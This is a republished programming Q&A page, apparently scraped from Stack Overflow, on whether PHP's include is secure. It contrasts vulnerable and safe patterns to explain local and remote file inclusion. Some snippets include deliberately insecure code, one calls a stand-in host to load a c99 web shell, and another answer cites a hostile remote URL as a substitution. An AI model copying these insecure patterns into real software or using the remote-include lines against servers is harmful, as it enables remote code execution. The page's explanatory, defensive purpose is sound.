PHP – Is "include" function secure?

I’m using the “include” function (e.x. “include ‘header2.php'” or “include ‘class.users.php'”)
to add the header or session class in my website. I don’t really remember where, but I heard that hackers abuse, somehow, this “include” thing, sending the fake included page or something like that.
So basically I would like to know what’s with that “include” function, how can I protect it, how do they abuse it and if there are better solutions for what I am looking for.

Thanks in advance.

Here is Solutions:

We have many solutions to this problem, But we recommend you to use the first solution because it is tested & true solution that will 100% work for you.

Solution 1

It all depends on how you implement it. If you specifically set the path, then it’s secure. The attack could happen if you allow user input to determine the file path without sanitization or checks.

Insecure (Directory Traversal)

<?php 
include($_GET['file']);
?>

Insecure (URL fopen – If enabled)

<?php 
include('http://evil.com/c99shell.php');
?>

Insecure

<?php 
include('./some_dir/' . $_GET['file']);
?>

Partially Insecure ( *.php files are vulnerable )

<?php 
include('./some_dir/' . $_GET['file'] . '.php');
?>

Secure (Though not sure why anyone would do this.)

<?php 
$allowed = array(
    'somefile.php',
    'someotherfile.php'
);

if (in_array(basename($_GET['file']), $allowed)) {
    include('./includes/' . basename($_GET['file']));
}
?>

Secure

<?php 
include('./includes/somefile.php');
?>

Solution 2

The biggest issue with includes is likely changing filename extension from PHP to something that doesn’t get automatically executed by the web server. For example- library.inc, or config.inc. Invoking these files with a web browser will reveal the code instead of executing it – and any passwords or exploitable hints will be shown.

Compare config.php that might have a password in it with config.inc. Pulling up config.inc would in most cases show what the database password was.

There are programmers who use .inc extensions for libraries. The premise is that they won’t be in a directory accessible by a web server. However, less security paranoid programmers might dump that file into a convenient web directory.

Otherwise, ensure that you don’t include a file that’s submitted by a query string somehow. Ex: include( $_GET['menu_file'] ) <– this is very wrong.

Solution 3

Include can be abused if you do something like this:

include($_GET["page"]);

and then call the URL:

myscript.php?page=index.php

attackers can then substitute index.php for hxxp://hackerz.ru/install_stuff.php and your server will gladly run it.

include itself is perfectly safe. Just make sure to always validate/escape your input.

Solution 4

Anything server side (assuming your server isn’t compromised) is safe. Doing this:

$var = $_GET['var']';    
include $var . ".php";

is insecure.

include "page.php"; 

is secure.

Solution 5

Include is safe provided you don’t:

  1. Include a remote file like www.someoneelsesssite.com/something.php
  2. Include a file from a path that came from the client. www.mysite.com/bad.php?path=oops/here/is/your/passwords/file
  3. Include a file from another possibly tainted source like a database.

2 and 3 technically have the caveat that if you disallow . or / or on windows \ you are probably fine. But if you don’t know why, you don’t know enough about it to risk it. Even when you think the database is read only or otherwise secure, it is wise to not assume that unless you really have to, which is almost never.

As pp19dd’s answer points out. It is also vital that you name your includes with the .php extension. If you’ve set apache (or whatever web server you are using) to parse another file type as PHP too, that’s safe as well. But if you don’t know for sure, use .php exclusively.

Solution 6

The best thing to do is ensure that the page you are trying to include exists first. The real security loopholes come when your include page is processed from some sort of user input, such as a URL variable. ?include=page.php As long as you are cautious of these you should be fine.

if(is_file($file)) {
    //other code, such as user verification and such should also go here
    include $file;
}
else { die(); }

Solution 7

I’m using this method.

<?php include (dirname(__FILE__).'/file.php');

Note: Use and implement solution 1 because this method fully tested our system.
Thank you 🙂

All methods was sourced from stackoverflow.com or stackexchange.com, is licensed under cc by-sa 2.5, cc by-sa 3.0 and cc by-sa 4.0

Leave a Reply